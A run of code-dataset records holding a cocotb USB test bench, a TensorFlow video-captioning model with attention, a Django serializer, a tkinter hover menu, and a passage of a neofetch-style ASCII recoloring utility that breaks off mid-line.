0x0A, 0x00]\n# out_data = [\n# 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n# 0x08, 0x09, 0x0A, 0x0B,\n# ]\n\n# epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n# yield harness.clear_pending(epaddr_out)\n\n# # Setup stage\n# # -----------\n# yield harness.transaction_setup(addr, setup_data)\n\n# # Data stage\n# # ----------\n# yield harness.set_response(epaddr_out, EndpointResponse.NAK)\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_nak()\n\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_nak()\n\n# #for i in range(200):\n# # yield\n\n# yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_ack()\n# yield harness.host_expect_data(epaddr_out, out_data)\n# yield harness.clear_pending(epaddr_out)\n\n@cocotb.test()\ndef test_in_transfer(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr = EndpointType.epaddr(1, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8]\n\n yield harness.clear_pending(epaddr)\n yield harness.set_response(epaddr, EndpointResponse.NAK)\n\n yield harness.set_data(epaddr, d[:4])\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA1, d[:4])\n yield harness.host_send_ack()\n\n pending = yield harness.pending(epaddr)\n if pending:\n raise TestFailure(\"data was still pending\")\n yield harness.clear_pending(epaddr)\n yield harness.set_data(epaddr, d[4:])\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA0, d[4:])\n yield harness.host_send_ack()\n\n@cocotb.test()\ndef test_in_transfer_stuff_last(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr = EndpointType.epaddr(1, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x37, 0x75, 0x00, 0xe0]\n\n yield harness.clear_pending(epaddr)\n yield harness.set_response(epaddr, EndpointResponse.NAK)\n\n yield harness.set_data(epaddr, d)\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA1, d)\n\n@cocotb.test()\ndef test_debug_in(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n yield harness.write(harness.csrs['usb_address'], addr)\n # The \"scratch\" register defaults to 0x12345678 at boot.\n reg_addr = harness.csrs['ctrl_scratch']\n setup_data = [0xc3, 0x00,\n (reg_addr >> 0) & 0xff,\n (reg_addr >> 8) & 0xff,\n (reg_addr >> 16) & 0xff,\n (reg_addr >> 24) & 0xff, 0x04, 0x00]\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n\n yield harness.transaction_data_in(addr, epaddr_in, [0x2, 0x4, 0x6, 0x8, 0xa], chunk_size=64)\n\n yield harness.clear_pending(epaddr_out)\n yield harness.clear_pending(epaddr_in)\n\n # Setup stage\n yield harness.host_send_token_packet(PID.SETUP, addr, epaddr_out)\n yield harness.host_send_data_packet(PID.DATA0, setup_data)\n yield harness.host_expect_ack()\n\n # Data stage\n yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n yield harness.host_send_ack()\n\n # Status stage\n yield harness.host_send_token_packet(PID.OUT, addr, epaddr_in)\n yield harness.host_send_data_packet(PID.DATA1, [])\n yield harness.host_expect_ack()\n\n# @cocotb.test()\n# def test_debug_in_missing_ack(dut):\n# harness = UsbTest(dut)\n# yield harness.reset()\n# yield harness.connect()\n\n# addr = 28\n# reg_addr = harness.csrs['ctrl_scratch']\n# setup_data = [0xc3, 0x00,\n# (reg_addr >> 0) & 0xff,\n# (reg_addr >> 8) & 0xff,\n# (reg_addr >> 16) & 0xff,\n# (reg_addr >> 24) & 0xff, 0x04, 0x00]\n# epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n# epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n\n# # Setup stage\n# yield harness.host_send_token_packet(PID.SETUP, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA0, setup_data)\n# yield harness.host_expect_ack()\n\n# # Data stage (missing ACK)\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n\n# # Data stage\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_data_packet(PID.DATA1, [0x12, 0, 0, 0])\n# yield harness.host_send_ack()\n\n# # Status stage\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, [])\n# yield harness.host_expect_ack()\n\n@cocotb.test()\ndef test_debug_out(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n yield harness.write(harness.csrs['usb_address'], addr)\n reg_addr = harness.csrs['ctrl_scratch']\n setup_data = [0x43, 0x00,\n (reg_addr >> 0) & 0xff,\n (reg_addr >> 8) & 0xff,\n (reg_addr >> 16) & 0xff,\n (reg_addr >> 24) & 0xff, 0x04, 0x00]\n ep0in_addr = EndpointType.epaddr(0, EndpointType.IN)\n ep1in_addr = EndpointType.epaddr(1, EndpointType.IN)\n ep0out_addr = EndpointType.epaddr(0, EndpointType.OUT)\n\n # Force Wishbone to acknowledge the packet\n yield harness.clear_pending(ep0out_addr)\n yield harness.clear_pending(ep0in_addr)\n yield harness.clear_pending(ep1in_addr)\n\n # Setup stage\n yield harness.host_send_token_packet(PID.SETUP, addr, ep0out_addr)\n yield harness.host_send_data_packet(PID.DATA0, setup_data)\n yield harness.host_expect_ack()\n\n # Data stage\n yield harness.host_send_token_packet(PID.OUT, addr, ep0out_addr)\n yield harness.host_send_data_packet(PID.DATA1, [0x42, 0, 0, 0])\n yield harness.host_expect_ack()\n\n # Status stage (wrong endopint)\n yield harness.host_send_token_packet(PID.IN, addr, ep1in_addr)\n yield harness.host_expect_nak()\n\n # Status stage\n yield harness.host_send_token_packet(PID.IN, addr, ep0in_addr)\n yield harness.host_expect_data_packet(PID.DATA1, [])\n yield harness.host_send_ack()\n\n new_value = yield harness.read(reg_addr)\n if new_value != 0x42:\n raise TestFailure(\"memory at 0x{:08x} should be 0x{:08x}, but memory value was 0x{:08x}\".format(reg_Addr, 0x42, new_value))","sub_path":"sim/test-common.py","file_name":"test-common.py","file_ext":"py","file_size_in_byte":33760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289299569","text":"# load data\nimport os, sys, json, time\nimport numpy as np\nimport tensorflow as tf\n\n# argv\nfpath_data_dir = sys.argv[1] + os.sep if len(sys.argv) > 1 else './data/MLDS_hw2_data/'\nfpath_test_output = sys.argv[2] if len(sys.argv) > 2 else 'test_atten.csv'\nfpath_peer_output = sys.argv[3] if len(sys.argv) > 3 else 'peer.csv'\n\n# file path\nfpath_train_data = fpath_data_dir + 'training_data/feat/'\nfpath_train_label = fpath_data_dir + 'training_label.json'\nfpath_test_data = fpath_data_dir + 'testing_data/feat/'\nfpath_test_ids = fpath_data_dir + 'testing_id.txt'\nfpath_peer_data = fpath_data_dir + 'peer_review/feat/'\nfpath_peer_ids = fpath_data_dir + 'peer_review_id.txt'\n\n# train\nrun_train = False\n\ndef load_train_data(fpath_data, fpath_label, word2id=None):\n \"\"\"Load Training Data\"\"\"\n print('Load Training Data ...')\n start_time = time.time()\n # if no word2id\n if word2id is None:\n word2id = dict()\n word2id[''] = len(word2id) # padding\n word2id[''] = len(word2id) # begin of sentence\n word2id[''] = len(word2id) # end of sentence\n word2id[''] = len(word2id) # unknown\n # load data\n X, Ys, video_ids = [], [], []\n for video in json.load(open(fpath_label, 'r')): # each vedio\n vedio_id = video['id']\n vedio_labels = video['caption']\n vedio_feature = np.load(fpath_data + vedio_id + '.npy')\n # word2id\n for caption_idx, caption in enumerate(vedio_labels): # each caption\n caption = caption.lower().strip().strip('.').split()\n caption = [''] + caption + ['']\n for word_idx, word in enumerate(caption): # each word\n if word not in word2id:\n word2id[word] = len(word2id)\n caption[word_idx] = word2id[word]\n vedio_labels[caption_idx] = caption\n # append\n X.append(vedio_feature)\n Ys.append(vedio_labels)\n video_ids.append(vedio_id)\n # return\n print('Time: {:.2f}s'.format(time.time()-start_time))\n return X, Ys, video_ids, word2id\n\n\ndef load_test_data(fpath_data, fpath_test_ids):\n \"\"\"Load Testing Data\"\"\"\n print('Load Testing Data ...')\n start_time = time.time()\n # load data\n X, video_ids = [], []\n for line in open(fpath_test_ids, 'r'): # each vedio\n vedio_id = line.strip()\n vedio_feature = np.load(fpath_data + vedio_id + '.npy')\n # append\n X.append(vedio_feature)\n video_ids.append(vedio_id)\n # return\n print('Time: {:.2f}s'.format(time.time()-start_time))\n return X, video_ids\n\n\ntrain_X, train_Ys, train_video_ids, word2id = load_train_data(fpath_train_data, fpath_train_label)\nid2word = dict(zip(word2id.values(), word2id))\n\n# params\nfeature_dim = train_X[0].shape[1]\nvocab_size = len(word2id)\nmax_frame_len = train_X[0].shape[0]\nmax_sent_len = np.array([len(caption) for vedio in train_Ys for caption in vedio]).max()\nprint('feature_dim:', feature_dim)\nprint('vocab_size:', vocab_size)\nprint('max_frame_len:', max_frame_len)\nprint('max_sent_len:', max_sent_len)\n\n# pading Ys\nfor vedio_idx, vedio in enumerate(train_Ys):\n for caption_idx, caption in enumerate(vedio):\n if len(caption) < max_sent_len:\n vedio[caption_idx] += [0]*(max_sent_len-len(caption))\n train_Ys[vedio_idx] = np.array(vedio)\n\n\nclass Seq2seq(object):\n def __init__(self, input_dim, vocab_size, hidden_dim, encode_steps, decode_steps, load_model_path=None):\n # params\n self._input_dim = input_dim\n self._vocab_size = vocab_size\n self._hidden_dim = hidden_dim\n self._encode_steps = encode_steps # video\n self._decode_steps = decode_steps # caption\n # placeholders\n tf.reset_default_graph()\n self.inputs = tf.placeholder(tf.float32, [None, self._encode_steps, self._input_dim]) # (batch_size, video_steps, features)\n self.caption = tf.placeholder(tf.int32, [None, self._decode_steps]) # (batch_size, caption_steps)\n self.batch_size = tf.placeholder(tf.int32) # number of videos\n self.ground_truth_prob = tf.placeholder(tf.float32) # feed truth/predict word. 0.~1. if train, 0. if test\n # variables\n self.encode_image_W = tf.Variable(tf.truncated_normal([self._input_dim, self._hidden_dim], stddev=0.1), name='encode_image_W')\n self.encode_image_B = tf.Variable(tf.zeros([self._hidden_dim]), name='encode_image_B')\n self.word_emb = tf.Variable(tf.truncated_normal([self._vocab_size, self._hidden_dim], stddev=0.1), name='word_emb')\n self.lstm1 = tf.nn.rnn_cell.BasicLSTMCell(self._hidden_dim, state_is_tuple=True) # encode\n self.lstm2 = tf.nn.rnn_cell.BasicLSTMCell(self._hidden_dim, state_is_tuple=True) # decode\n self.decode_word_W = tf.Variable(tf.truncated_normal([self._hidden_dim, self._vocab_size], stddev=0.1), name='decode_word_W')\n self.decode_word_B = tf.Variable(tf.zeros([self._vocab_size]), name='decode_word_B')\n self.optimizer = tf.train.AdamOptimizer(learning_rate=0.001, name='Adam')\n # models\n self.pred = self._build_predict()\n self.loss = self._build_loss()\n self.optimize = self._build_optimize()\n self.accuracy = self._build_accuracy()\n # vars\n self.vars = {var.name: var for var in tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)}\n self.saver = tf.train.Saver(self.vars)\n # init session\n self.sess = tf.Session()\n # restore model\n if load_model_path is not None:\n self.load(load_model_path)\n else:\n self.sess.run(tf.global_variables_initializer())\n \n def _build_predict(self):\n print('build predict')\n # dense (batch_size, video_steps, features) -> (batch_size, video_steps, hidden)\n video_flat = tf.reshape(self.inputs, [-1, self._input_dim])\n image_emb = tf.nn.xw_plus_b(video_flat, self.encode_image_W, self.encode_image_B)\n image_emb = tf.nn.relu(image_emb)\n image_emb = tf.reshape(image_emb, [-1, self._encode_steps, self._hidden_dim])\n # lstm encode\n state1_c = tf.zeros([self.batch_size, self.lstm1.state_size[0]])\n state1_h = tf.zeros([self.batch_size, self.lstm1.state_size[1]])\n state2_c = tf.zeros([self.batch_size, self.lstm2.state_size[0]])\n state2_h = tf.zeros([self.batch_size, self.lstm2.state_size[1]])\n padding = tf.zeros([self.batch_size, self._hidden_dim])\n encode_hs = []\n for step in range(0, self._encode_steps):\n with tf.variable_scope(tf.get_variable_scope()):\n if step > 0:\n tf.get_variable_scope().reuse_variables()\n output1, (state1_c, state1_h) = self.lstm1(tf.concat([padding, image_emb[:,step,:]], 1), (state1_c, state1_h), scope='lstm1')\n output2, (state2_c, state2_h) = self.lstm2(tf.concat([padding, output1], 1), (state2_c, state2_h), scope='lstm2')\n encode_hs.append(output1)\n # attension\n encode_hs = tf.stack(encode_hs, axis=0) # t x b x h\n encode_hs = tf.transpose(encode_hs, [1,0,2]) # b x t x h \n def attention_context(encode_hs, decode_h):\n # encode_hs -> b x t x h\n # alpha\n alphas = tf.multiply(encode_hs, tf.expand_dims(decode_h, 1))\n alphas = tf.reduce_sum(alphas, 2, keep_dims=True)\n # weighted sum\n alphas = tf.nn.softmax(alphas, 1)\n contex = tf.multiply(encode_hs, alphas)\n contex = tf.reduce_sum(contex, axis=1)\n return contex\n # lstm decode\n caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n output_captions = []\n for step in range(0, self._decode_steps+1):\n with tf.variable_scope(tf.get_variable_scope()):\n # random select from ground truth or predict by self.ground_truth_prob\n previous_word_gt = caption[:, step] # ground truth\n previous_word_pred = tf.cast(tf.argmax(output2, axis=1), tf.int32) # predict\n indice = tf.multinomial(tf.log([[self.ground_truth_prob, 1-self.ground_truth_prob]]), 1)\n indice = tf.squeeze(indice, [0])\n previous_word = tf.gather(tf.stack([previous_word_gt, previous_word_pred]), indice)\n previous_word = tf.squeeze(previous_word, [0])\n # word embedding\n with tf.device(\"/cpu:0\"):\n previous_word_embed = tf.nn.embedding_lookup(self.word_emb, previous_word)\n # feed\n tf.get_variable_scope().reuse_variables()\n output1, (state1_c, state1_h) = self.lstm1(tf.concat([previous_word_embed, padding], 1), (state1_c, state1_h), scope='lstm1')\n # attention\n context = attention_context(encode_hs, output1)\n output2, (state2_c, state2_h) = self.lstm2(tf.concat([context, output1], 1), (state2_c, state2_h), scope='lstm2')\n output_captions.append(output2)\n output = tf.stack(output_captions[:-1], axis=1) # stack with step, ignore last padding step\n # dense \n output = tf.reshape(output, [-1, self._hidden_dim])\n output = tf.nn.xw_plus_b(output, self.decode_word_W, self.decode_word_B)\n output = tf.nn.softmax(output) \n output = tf.reshape(output, [-1, self._decode_steps, self._vocab_size]) \n return output\n \n def _build_loss(self):\n print('build loss')\n caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n caption = caption[:,1:]\n mask = tf.cast(tf.not_equal(caption, 0), tf.float32)\n mask /= tf.reduce_mean(tf.reduce_mean(mask))\n caption = tf.one_hot(caption, depth=self._vocab_size, axis=2)\n cross_entropy = caption * tf.log(self.pred)\n cross_entropy = -tf.reduce_mean(cross_entropy, axis=2)\n cross_entropy *= mask\n cross_entropy = tf.reduce_mean(cross_entropy, axis=1)\n return tf.reduce_mean(cross_entropy)\n \n def _build_optimize(self):\n print('build optimize')\n clip_value = 1.\n trainable_variables = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.loss, trainable_variables), clip_value)\n return self.optimizer.apply_gradients(zip(grads, trainable_variables))\n \n def _build_accuracy(self):\n print('build accuracy')\n caption = tf.pad(self.caption, [[0,0],[0,1]]) # padding one more step\n caption = caption[:,1:]\n correct = tf.equal(caption, tf.cast(tf.argmax(self.pred, 2), tf.int32))\n correct = tf.cast(correct, tf.float32)\n mask = tf.cast(tf.not_equal(caption, 0), tf.float32)\n mask /= tf.reduce_mean(tf.reduce_mean(mask))\n correct *= mask\n return tf.reduce_mean(tf.reduce_mean(correct))\n \n def fit(self, train, valid=None, ground_truth_prob=1., ground_truth_prob_decay=0.99 ,num_epochs=10, batch_size=32, eval_every=1, shuffle=False, save_min_loss=False, id2word=None):\n train_X = np.array(train[0], dtype='float32')\n train_Y = np.array(train[1])\n min_loss = 0.\n for epoch in range(num_epochs):\n # shuffle\n if shuffle:\n shuffle_idx = np.random.permutation(len(train_X))\n train_X = train_X[shuffle_idx]\n train_Y = train_Y[shuffle_idx]\n # epoch\n num_steps = (len(train_X)-1)//batch_size + 1\n for step in range(num_steps):\n batch_x = train_X[step*batch_size : step*batch_size+batch_size]\n batch_y = train_Y[step*batch_size : step*batch_size+batch_size]\n batch_y = np.array([y[np.random.randint(len(y), size=1)[0]] for y in batch_y], dtype='int32')\n # run\n self.sess.run(self.optimize, feed_dict={self.inputs: batch_x, \n self.caption: batch_y, \n self.batch_size: len(batch_x), \n self.ground_truth_prob: ground_truth_prob})\n loss, acc = self.evaluate(batch_x, batch_y, batch_size=batch_size)\n print('epoch:{:>2d}/{:<2d} batch:{:>4d}/{:<4d} gt_prob:{:<.3f} '.format(epoch+1, \n num_epochs, \n step*batch_size, \n num_steps*batch_size, \n ground_truth_prob), \n end='')\n print('loss:{:<3.5f} acc:{:>3.1f}% '.format(loss, 100*acc), end='')\n # evaluation\n if step % eval_every == 0 and valid is not None:\n valid_x = np.array(valid[0], dtype='float32')\n valid_y = np.array(valid[1])\n valid_y = np.array([y[np.random.randint(len(y), size=1)[0]] for y in valid_y], dtype='int32')\n val_loss, val_acc = self.evaluate(valid_x, valid_y, batch_size=batch_size)\n print('val_loss:{:<3.5f} val_acc:{:>3.1f}% '.format(val_loss, 100*val_acc), end='')\n # save_min_loss\n if save_min_loss and (min_loss == 0. or val_loss < min_loss):\n min_loss = val_loss\n self.save('./models/atten_best', verbose=False)\n print('save min loss model '.format(min_loss), end='')\n # visaul\n if id2word is not None:\n sample_idx = np.random.randint(len(valid_x))\n visual_x = self.predict(valid_x[sample_idx:sample_idx+1])\n visual_y = valid_y[sample_idx:sample_idx+1]\n print()\n print(' visual_model: {}'.format(self.visual(visual_x, id2word)[0]))\n print(' visual_truth: {} '.format(self.visual(visual_y, id2word)[0]), end='')\n print()\n # update prob\n ground_truth_prob = max(ground_truth_prob*ground_truth_prob_decay, 0.5)\n \n def evaluate(self, x, y, batch_size=32):\n losses, accs = [], []\n offset = 0\n while offset < len(x):\n batch_x = x[offset : offset+batch_size]\n batch_y = y[offset : offset+batch_size]\n loss, acc = self.sess.run([self.loss, self.accuracy], feed_dict={self.inputs: batch_x, \n self.caption: batch_y, \n self.batch_size: len(batch_x), \n self.ground_truth_prob: 0.})\n losses += [loss] * len(batch_x)\n accs += [acc] * len(batch_x)\n offset += batch_size\n return np.array(losses).mean(), np.array(accs).mean()\n \n def predict(self, x, batch_size=32):\n preds = []\n offset = 0\n while offset < len(x):\n batch_x = x[offset : offset+batch_size]\n batch_y = np.zeros([len(batch_x), self._decode_steps], dtype='int32')\n pred = self.sess.run(self.pred, feed_dict={self.inputs: batch_x, \n self.caption: batch_y, \n self.batch_size: len(batch_x), \n self.ground_truth_prob: 0.})\n preds.append(np.argmax(pred, axis=2))\n offset += batch_size\n return np.vstack(preds)\n \n def visual(self, ys, id2word):\n results = []\n for pred in ys:\n pred_words = np.vectorize(id2word.get)(pred)\n statr_idx = np.where(pred_words=='')[0][0] if '' in pred_words else 0\n end_idx = np.where(pred_words=='')[0][0] if '' in pred_words else len(pred_words)\n sentence = ' '.join(pred_words[statr_idx:end_idx+1])\n sentence = sentence.replace('','').replace('','').strip()\n results.append(sentence)\n return results\n \n def save(self, checkpoint_file_path, verbose=True):\n if not os.path.exists(os.path.dirname(checkpoint_file_path)):\n os.makedirs(os.path.dirname(checkpoint_file_path))\n self.saver.save(self.sess, checkpoint_file_path)\n if verbose: print('Model saved to: {}'.format(checkpoint_file_path))\n \n def load(self, checkpoint_file_path, verbose=True):\n self.saver.restore(self.sess, checkpoint_file_path)\n if verbose: print('Model restored from: {}'.format(checkpoint_file_path))\n \n def summary(self):\n print('='*50)\n print('Summary:')\n variables = [variable for variable in tf.trainable_variables()]\n total_parms = 0\n for variable in variables:\n name = variable.name\n shape = variable.shape\n parms = np.array(list(variable.shape), dtype='int32').prod()\n print('Var: {} shape: {} parms: {:,}'.format(name, shape, parms))\n total_parms += parms\n print('='*50)\n print('Total Parameters: {:,}'.format(total_parms))\n\nmodel = Seq2seq(feature_dim, vocab_size, 512, max_frame_len, max_sent_len, load_model_path='models/atten/atten_finish')\nmodel.summary()\n\nif run_train:\n try:\n model.fit(train=[train_X[:], train_Ys[:]], \n valid=[train_X[-50:], train_Ys[-50:]], \n num_epochs=100, \n batch_size=128,\n ground_truth_prob=1., \n ground_truth_prob_decay=0.997,\n shuffle=True,\n eval_every=1,\n save_min_loss=False,\n id2word=id2word)\n except KeyboardInterrupt: # ctrl + c\n pass\n model.save('./tmp/atten_finish')\n\n \n# output test\ntest_X, test_video_ids = load_test_data(fpath_test_data, fpath_test_ids)\npreds = model.predict(test_X)\npreds = model.visual(preds, id2word)\nwith open(fpath_test_output, 'w') as o:\n for sent, video_id in zip(preds, test_video_ids):\n _ = o.write('{},{}\\n'.format(video_id, sent))\n\npeer_X, peer_video_ids = load_test_data(fpath_peer_data, fpath_peer_ids)\npreds = model.predict(peer_X)\npreds = model.visual(preds, id2word)\nwith open(fpath_peer_output, 'w') as o:\n for sent, video_id in zip(preds, peer_video_ids):\n _ = o.write('{},{}\\n'.format(video_id, sent))\n\n","sub_path":"hw2/model_atten.py","file_name":"model_atten.py","file_ext":"py","file_size_in_byte":18882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"498775041","text":"from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\nfrom rest_framework import serializers\n\nfrom upday.field.encrypt_field import EncryptField\nfrom upday.models import Share, AnswerBoard, DailyAttendance\n\n\nclass CreateValidator(serializers.Serializer):\n \"\"\"\n 完成打卡,创建每日签到\n \"\"\"\n answer_board_id = EncryptField('HASH_KEY_ANSWER_BOARD_ID')\n\n def validate(self, attrs):\n student = self.context['request'].user\n try:\n answer_board = AnswerBoard.objects.get(id=attrs['answer_board_id'])\n except MultipleObjectsReturned:\n msg = {'result': 'Multiply answer_board'}\n raise serializers.ValidationError(msg, code='validation')\n except ObjectDoesNotExist:\n msg = {'result': 'No such a answer_board'}\n raise serializers.ValidationError(msg, code='validation')\n try:\n # 刷新页面重复调用接口\n daily_attendance = DailyAttendance.objects.get(answer_board=answer_board)\n except MultipleObjectsReturned:\n msg = {'result': 'Multiply daily_attendance'}\n raise serializers.ValidationError(msg, code='validation')\n except ObjectDoesNotExist:\n # 创建日签\n share = Share.objects.create(sharer=student, type=1)\n daily_attendance = DailyAttendance.objects.create(share=share, answer_board=answer_board)\n attrs['daily_attendance'] = daily_attendance\n return attrs\n\n\nclass CheckValidator(serializers.Serializer):\n \"\"\"\n 查看别人的日签\n \"\"\"\n daily_attendance_id = EncryptField('HASH_KEY_DAILY_ATTENDANCE_ID')\n\n def validate(self, attrs):\n daily_attendance_id = attrs['daily_attendance_id']\n student = self.context['request'].user\n try:\n daily_attendance = DailyAttendance.objects.get(id=daily_attendance_id)\n except MultipleObjectsReturned:\n msg = {'result': 'Multiply daily_attendance'}\n raise serializers.ValidationError(msg, code='validation')\n except ObjectDoesNotExist:\n msg = {'result': 'No such a daily_attendance'}\n raise serializers.ValidationError(msg, code='validation')\n attrs['daily_attendance'] = daily_attendance\n if daily_attendance.share.sharer != student:\n is_myself = 0\n else:\n is_myself = 1\n attrs['is_myself'] = is_myself\n return attrs\n","sub_path":"upday/modules/daily_attendance/serializer/daily_attendance_serializer.py","file_name":"daily_attendance_serializer.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"149965231","text":"from tkinter import *\nimport re\n\nclass HoverInfo(Menu):\n def __init__(self, parent, text, command=None):\n self._com = command\n Menu.__init__(self,parent, tearoff=0)\n if not isinstance(text, str):\n raise TypeError('Trying to initialise a Hover Menu with a non string type: ' + text.__class__.__name__)\n toktext=re.split('\\n', text)\n for t in toktext:\n self.add_command(label = t)\n self._displayed=False\n self.master.bind(\"\",self.Display )\n self.master.bind(\"\",self.Remove )\n\n def __del__(self):\n self.master.unbind(\"\")\n self.master.unbind(\"\")\n\n def Display(self,event):\n if not self._displayed:\n self._displayed=True\n self.post(event.x_root, event.y_root)\n if self._com != None:\n self.master.unbind_all(\"\")\n self.master.bind_all(\"\", self.Click)\n\n def Remove(self, event):\n if self._displayed:\n self._displayed=False","sub_path":"HoverClass.py","file_name":"HoverClass.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348678286","text":"from __future__ import annotations\n\nimport os\nimport platform\nimport re\nimport shlex\nimport shutil\nimport subprocess\nimport sys\nimport zipfile\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom tempfile import TemporaryDirectory\nfrom typing import Iterable\n\nimport pkg_resources\n\nfrom .color_util import color, printc\nfrom .constants import GLOBAL_CFG, MINGIT_URL, IS_WINDOWS\nfrom .distros import distro_detector\nfrom .presets import ColorProfile\nfrom .serializer import from_dict\nfrom .types import BackendLiteral, ColorAlignMode\n\nRE_NEOFETCH_COLOR = re.compile('\\\\${c[0-9]}')\n\n\ndef literal_input(prompt: str, options: Iterable[str], default: str, show_ops: bool = True) -> str:\n \"\"\"\n Ask the user to provide an input among a list of options\n\n :param prompt: Input prompt\n :param options: Options\n :param default: Default option\n :param show_ops: Show options\n :return: Selection\n \"\"\"\n options = list(options)\n lows = [o.lower() for o in options]\n\n if show_ops:\n op_text = '|'.join([f'&l&n{o}&L&N' if o == default else o for o in options])\n printc(f'{prompt} ({op_text})')\n else:\n printc(f'{prompt} (default: {default})')\n\n def find_selection(sel: str):\n if not sel:\n return None\n\n # Find exact match\n if sel in lows:\n return options[lows.index(sel)]\n\n # Find starting abbreviation\n for i, op in enumerate(lows):\n if op.startswith(sel):\n return options[i]\n\n return None\n\n selection = input('> ').lower() or default\n while not find_selection(selection):\n print(f'Invalid selection! {selection} is not one of {\"|\".join(options)}')\n selection = input('> ').lower() or default\n\n print()\n\n return find_selection(selection)\n\n\ndef term_size() -> tuple[int, int]:\n \"\"\"\n Get terminal size\n :return:\n \"\"\"\n try:\n return os.get_terminal_size().columns, os.get_terminal_size().lines\n except Exception:\n return 100, 20\n\n\ndef ascii_size(asc: str) -> tuple[int, int]:\n \"\"\"\n Get distro ascii width, height ignoring color code\n\n :param asc: Distro ascii\n :return: Width, Height\n \"\"\"\n return max(len(line) for line in re.sub(RE_NEOFETCH_COLOR, '', asc).split('\\n')), len(asc.split('\\n'))\n\n\ndef normalize_ascii(asc: str) -> str:\n \"\"\"\n Make sure every line are the same width\n \"\"\"\n w = ascii_size(asc)[0]\n return '\\n'.join(line + ' ' * (w - ascii_size(line)[0]) for line in asc.split('\\n'))\n\n\ndef fill_starting(asc: str) -> str:\n \"\"\"\n Fill the missing starting placeholders.\n\n E.g. \"${c1}...\\n...\" -> \"${c1}...\\n${c1}...\"\n \"\"\"\n new = []\n last = ''\n for line in asc.split('\\n'):\n new.append(last + line)\n\n # Line has color placeholders\n matches = RE_NEOFETCH_COLOR.findall(line)\n if len(matches) > 0:\n # Get the last placeholder for the next line\n last = matches[-1]\n\n return '\\n'.join(new)\n\n\n@dataclass\nclass ColorAlignment:\n mode: ColorAlignMode\n\n # custom_colors[ascii color index] = unique color index in preset\n custom_colors: dict[int, int] = ()\n\n # Foreground/background ascii color index\n fore_back: tuple[int, int] = ()\n\n @classmethod\n def from_dict(cls, d: dict):\n return from_dict(cls, d)\n\n def recolor_ascii(self, asc: str, preset: ColorProfile) -> str:\n \"\"\"\n Use the color alignment to recolor an ascii art\n\n :return Colored ascii, Uncolored lines\n \"\"\"\n asc = fill_starting(asc)\n\n if self.fore_back and self.mode in ['horizontal', 'vertical']:\n fore, back = self.fore_back\n\n # Replace foreground colors\n asc = asc.replace(f'${{c{fore}}}', color('&0' if GLOBAL_CFG.is_light else '&f'))\n lines = asc.split('\\n')\n\n # Add new colors\n if self.mode == 'horizontal':\n colors = preset.with_length(len(lines))\n asc = '\\n'.join([l.replace(f'${{c{back}}}', colors[i].to_ansi()) + color('&~&*') for i, l in enumerate(lines)])\n else:\n raise NotImplementedError()\n\n # Remove existing colors\n asc = re.sub(RE_NEOFETCH_COLOR, '', asc)\n\n elif self.mode in ['horizontal', 'vertical']:\n # Remove existing colors\n asc = re.sub(RE_NEOFETCH_COLOR, '', asc)\n lines = asc.split('\\n')\n\n # Add new colors\n if self.mode == 'horizontal':\n colors = preset.with_length(len(lines))\n asc = '\\n'.join([colors[i].to_ansi() + l + color('&~&*') for i, l in enumerate(lines)])\n else:\n asc = '\\n'.join(preset.color_text(line) + color('&~&*') for line in lines)\n\n else:\n preset = preset.unique_colors()\n\n # Apply colors\n color_map = {ai: 